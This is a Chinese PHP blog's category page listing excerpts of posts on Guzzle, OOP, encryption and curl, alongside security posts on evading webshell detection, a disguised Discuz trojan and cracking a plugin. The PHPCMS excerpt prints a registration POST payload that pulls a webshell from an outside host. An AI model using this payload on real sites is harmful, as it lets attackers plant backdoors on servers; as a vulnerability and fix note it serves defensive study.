php – 蜗居

GuzzleHttp new Pool获取body内容及带出结果

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 $allBranches = array(); $requests = function($projects) { foreach($projects as $project) { yield new Request('GET', "projects/".$project['id']."/repository/branches?per_page=100"); } }...

2018年05月30日汪洋大海暂无评论喜欢 0 阅读 221 views 次阅读全文

Guzzle 使用dome案例及多线程异步案例

虽然早就知道很多人用 Guzzle 爬数据，但是我却从来没有真正实践过，因为在我的潜意识里，抓取是 Python 的地盘。不过前段时间，当我抓汽车之家数据的时候，好心人跟我提起 Goutte 搭配 Guzzle 是最好的爬虫，让我一直记挂在心上，加上最近打算更新一下车型数据，于是我便重写了抓取汽车之家数据的脚本。因为我是通过接口抓取，而不是网页，所以暂时用不上 Goutte，只用 Gu...

2018年05月30日汪洋大海暂无评论喜欢 0 阅读 263 views 次阅读全文

php一句话木马检测绕过研究

文章作者：landgrey 0x00: 前言一般的，利用能够执行系统命令、加载代码的函数，或者组合一些普通函数，完成一些高级间谍功能的网站后门的脚本，叫做Webshell。本篇文章主要探讨关于PHP语言的Webshell检测工具和平台的绕过方法，实现能够绕过以下表格中7个主流(基本代表安全行业内PHP Webshell检测的一流水平)专业工具和平台检测的PHP Webshell，构造出零提示、无警告...

2018年05月21日汪洋大海暂无评论喜欢 0 阅读 256 views 次阅读全文

PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式（单态模式）/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结

PHP中的抽象类与抽象方法 1、什么是抽象方法？没有方法体 {} 的方法，必须使用abstract 关键字修饰。这样的方，我们叫做抽象方法。 abstract function say(); // 抽象方法 2、什么是抽象类？包含抽象方法的类就叫抽象类。抽象类必须使用abstract关键字修饰。 abstract class Person{} 3、抽象类的注意事项 ① 抽象类可以包...

2017年06月16日汪洋大海暂无评论喜欢 1 阅读 368 views 次阅读全文

PHPCMS最新版任意文件上传漏洞及修复方法

注意这个漏洞不知道是哪位朋友爆出来的，找不到来路。。我只是给了修复建议。首先打开注册页面，然后向注册页面POST如下payload： siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol= 然后就会报错并返回shell地址...

2017年04月21日学习笔记评论 2 条喜欢 1 阅读 1,567 views 次阅读全文

3组PHP加密解密方法 PHP可逆加密解密算法

第一组PHP函数是实现此加密解密的方法：加密算法如下： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 function encrypt($data, $key) { $key = md5($key); $x = 0; $len = strlen($data); $l = strlen($key); for ($i = 0; $i < $len; $i++) { if ($x == $l&...

2016年11月17日汪洋大海暂无评论喜欢 1 阅读 2,353 views 次阅读全文

【PHP代码审计】初级入门SQL注入过程

很多同学不明白SQL注入过程，这里讲解的非常详细，所以就转载过来了。 0x02 环境搭建 PHP+MySql的集成环境特别多，像PhpStudy、Wamp和Lamp等下一步下一步点下去就成功安装了，网上搜索一下很多就不赘述。这里提的环境是SQLol，它是一个可配置的SQL注入测试平台，包含了简单的SQL注入测试环境，即SQL语句的四元素增（Insert）、删（Delete）、改（Update）和查（Select）。 ...

2016年10月21日汪洋大海暂无评论喜欢 1 阅读 765 views 次阅读全文

一个伪装Discuz配置文件的php木马分析

问题出于土司论坛(地址)：https://www.t00ls.net/thread-36298-1-1.html 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96...

2016年10月19日漏洞安全评论 2 条喜欢 1 阅读 2,538 views 次阅读全文

Discuz admin.php后台异地登录提示及前台异地登录提示插件破解

首先修改后台文件source/admincp/admincp_main.php 在适当的位置添加如下代码： 1 2 3 4 5 6 7 8 9 10 11 12 13 if($_G[uid] && $_G['cookie']['logindetail']){ echo <<<EOT <div class="focus userlogin" id="login_unusual"> <div class="bm"> <div class=&...

2016年03月29日学习笔记暂无评论喜欢 0 阅读 1,125 views 次阅读全文

php curl_getinfo的巧用

最近使用curl的时候，发现了一个比较好用的函数，当然是初级者适用的一个函数，就是curl_getinfo(), 在抓取一个页面的时候，会遇到302页面跳转的情况，刚开始处理的时候，是用curl抓取一个域名页面的内容，适用curl_exec，抓取页面全部内容，然后用正则匹配出来用户域名url,通过此域名再次抓取此地址的内容，这样做挺麻烦的，后来发现curl_getinfo()，返回来一个数组类型的...

2016年02月13日汪洋大海暂无评论喜欢 0 阅读 856 views 次阅读全文